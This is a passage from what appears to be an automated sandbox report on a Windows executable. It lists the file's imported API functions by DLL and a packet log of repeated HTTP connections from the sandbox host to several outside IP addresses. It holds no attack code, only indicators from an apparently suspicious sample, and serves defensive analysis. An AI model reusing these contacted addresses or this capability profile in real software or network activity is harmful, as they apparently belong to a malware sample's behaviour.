Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system    Country where language is spoken    Map
English                           Great Britain
Timestamp                             Source Port  Dest Port  Source IP         Dest IP
Jul 16, 2024 07:21:44.178109884 CEST  49736        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:21:44.184111118 CEST  80           49736      3.33.130.190      192.168.2.4
Jul 16, 2024 07:21:44.184273958 CEST  49736        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:21:44.187586069 CEST  49736        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:21:44.192498922 CEST  80           49736      3.33.130.190      192.168.2.4
Jul 16, 2024 07:21:44.670972109 CEST  80           49736      3.33.130.190      192.168.2.4
Jul 16, 2024 07:21:44.671099901 CEST  80           49736      3.33.130.190      192.168.2.4
Jul 16, 2024 07:21:44.671164036 CEST  49736        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:21:44.674781084 CEST  49736        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:21:44.683383942 CEST  80           49736      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:07.800796032 CEST  49738        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:07.805980921 CEST  80           49738      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:07.806163073 CEST  49738        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:07.807704926 CEST  49738        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:07.814413071 CEST  80           49738      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:08.263324976 CEST  80           49738      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:08.263413906 CEST  49738        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:09.313399076 CEST  49738        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:09.318510056 CEST  80           49738      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:10.333174944 CEST  49739        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:10.397901058 CEST  80           49739      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:10.398085117 CEST  49739        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:10.400645971 CEST  49739        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:10.405529022 CEST  80           49739      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:10.854345083 CEST  80           49739      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:10.854463100 CEST  49739        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:11.907160997 CEST  49739        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:11.912221909 CEST  80           49739      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.926646948 CEST  49740        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:12.932468891 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.932760954 CEST  49740        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:12.935842991 CEST  49740        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:12.941206932 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941237926 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941289902 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941318989 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941370010 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941397905 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941431046 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941483021 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:12.941529989 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:13.397353888 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:13.397695065 CEST  49740        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:14.438375950 CEST  49740        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:14.443382025 CEST  80           49740      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:15.458031893 CEST  49741        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:15.463154078 CEST  80           49741      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:15.463330984 CEST  49741        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:15.465100050 CEST  49741        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:15.469907999 CEST  80           49741      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:15.940253973 CEST  80           49741      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:15.940316916 CEST  80           49741      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:15.940457106 CEST  49741        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:15.942595005 CEST  49741        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:15.947426081 CEST  80           49741      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:21.260024071 CEST  49742        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:21.265403986 CEST  80           49742      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:21.265764952 CEST  49742        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:21.268296003 CEST  49742        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:21.273442030 CEST  80           49742      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:21.846611977 CEST  80           49742      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:21.846645117 CEST  80           49742      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:21.846960068 CEST  49742        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:22.783235073 CEST  49742        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:23.802063942 CEST  49743        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:23.807667971 CEST  80           49743      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:23.811645985 CEST  49743        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:23.814245939 CEST  49743        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:23.819611073 CEST  80           49743      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:24.405503035 CEST  80           49743      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:24.406090975 CEST  80           49743      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:24.406167030 CEST  49743        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:25.329097033 CEST  49743        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:26.348802090 CEST  49744        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:26.353841066 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.353925943 CEST  49744        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:26.356976032 CEST  49744        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:26.362166882 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362186909 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362199068 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362210989 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362222910 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362234116 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362246037 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362257957 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.362271070 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.963517904 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.963593006 CEST  80           49744      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:26.963646889 CEST  49744        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:27.860393047 CEST  49744        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:28.887805939 CEST  49745        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:28.893317938 CEST  80           49745      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:28.893436909 CEST  49745        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:28.906313896 CEST  49745        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:28.911695957 CEST  80           49745      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:29.476762056 CEST  80           49745      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:29.476826906 CEST  80           49745      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:29.477037907 CEST  49745        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:29.479130030 CEST  49745        80         192.168.2.4       216.194.173.237
Jul 16, 2024 07:22:29.484250069 CEST  80           49745      216.194.173.237   192.168.2.4
Jul 16, 2024 07:22:34.509237051 CEST  49746        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:34.514332056 CEST  80           49746      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:34.514439106 CEST  49746        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:34.516191959 CEST  49746        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:34.521137953 CEST  80           49746      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:34.971210957 CEST  80           49746      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:34.971394062 CEST  49746        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:36.032202005 CEST  49746        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:36.043549061 CEST  80           49746      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:37.050620079 CEST  49747        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:37.056202888 CEST  80           49747      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:37.056332111 CEST  49747        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:37.058175087 CEST  49747        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:37.064677000 CEST  80           49747      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:37.533665895 CEST  80           49747      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:37.533803940 CEST  49747        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:38.563519001 CEST  49747        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:38.568595886 CEST  80           49747      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.583544970 CEST  49748        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:39.588756084 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.588952065 CEST  49748        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:39.591182947 CEST  49748        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:39.596278906 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596297026 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596308947 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596323967 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596337080 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596363068 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596406937 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596419096 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:39.596435070 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:40.045432091 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:40.045535088 CEST  49748        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:41.095632076 CEST  49748        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:41.101011992 CEST  80           49748      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:42.114772081 CEST  49749        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:42.656085968 CEST  80           49749      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:42.656232119 CEST  49749        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:42.658550024 CEST  49749        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:42.663882017 CEST  80           49749      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:43.121315956 CEST  80           49749      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:43.121376038 CEST  80           49749      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:43.121850967 CEST  49749        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:43.124417067 CEST  49749        80         192.168.2.4       3.33.130.190
Jul 16, 2024 07:22:43.132240057 CEST  80           49749      3.33.130.190      192.168.2.4
Jul 16, 2024 07:22:48.146617889 CEST  49750        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:48.152178049 CEST  80           49750      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:48.152252913 CEST  49750        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:48.154267073 CEST  49750        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:48.159418106 CEST  80           49750      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:48.798825026 CEST  80           49750      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:48.798886061 CEST  80           49750      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:48.803620100 CEST  49750        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:49.659646988 CEST  49750        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:50.677115917 CEST  49751        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:50.682364941 CEST  80           49751      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:50.682483912 CEST  49751        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:50.684969902 CEST  49751        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:50.690272093 CEST  80           49751      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:51.327538967 CEST  80           49751      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:51.327651978 CEST  80           49751      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:51.328035116 CEST  49751        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:52.188476086 CEST  49751        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:53.210655928 CEST  49752        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:53.216140985 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.219820976 CEST  49752        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:53.221884966 CEST  49752        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:53.227293015 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227335930 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227365971 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227447987 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227475882 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227503061 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227530956 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227586031 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.227613926 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.857085943 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.907275915 CEST  49752        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:53.947686911 CEST  80           49752      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:53.947882891 CEST  49752        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:54.735646009 CEST  49752        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:55.756382942 CEST  49753        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:55.761682987 CEST  80           49753      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:55.761776924 CEST  49753        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:55.764309883 CEST  49753        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:55.769730091 CEST  80           49753      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:56.388250113 CEST  80           49753      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:56.388748884 CEST  80           49753      212.227.172.254   192.168.2.4
Jul 16, 2024 07:22:56.388808966 CEST  49753        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:56.392081976 CEST  49753        80         192.168.2.4       212.227.172.254
Jul 16, 2024 07:22:56.396956921 CEST  80           49753      212.227.172.254   192.168.2.4
Jul 16, 2024 07:23:02.064857960 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:02.069827080 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:02.069904089 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:02.071733952 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:02.076554060 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.163319111 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.163382053 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.163415909 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.163469076 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:03.163578987 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.163615942 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.163650990 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.163702011 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:03.164231062 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.164268017 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.164303064 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.164310932 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:03.164391994 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:03.164395094 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.164855003 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:03.168534994 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.168785095 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.168818951 CEST  80           49754      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:03.168860912 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:03.168926001 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:03.579371929 CEST  49754        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:04.597775936 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:04.603123903 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:04.603238106 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:04.604759932 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:04.609961987 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.706542015 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.706624031 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.706666946 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.706700087 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.706733942 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.706743002 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:05.706765890 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.706793070 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:05.706801891 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.707221985 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:05.707444906 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.707479954 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.707515001 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.707550049 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:05.710552931 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:05.711733103 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.711896896 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.711930037 CEST  80           49755      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:05.711965084 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:05.714912891 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:06.110333920 CEST  49755        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:07.129820108 CEST  49756        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:07.307934999 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.312196970 CEST  49756        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:07.312196970 CEST  49756        80         192.168.2.4       43.157.128.107
Jul 16, 2024 07:23:07.317441940 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317483902 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317513943 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317574024 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317605019 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317632914 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317661047 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317689896 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:07.317718029 CEST  80           49756      43.157.128.107    192.168.2.4
Jul 16, 2024 07:23:08.399075985 CEST  80           49756      43.157.128.107    192.168.2.4
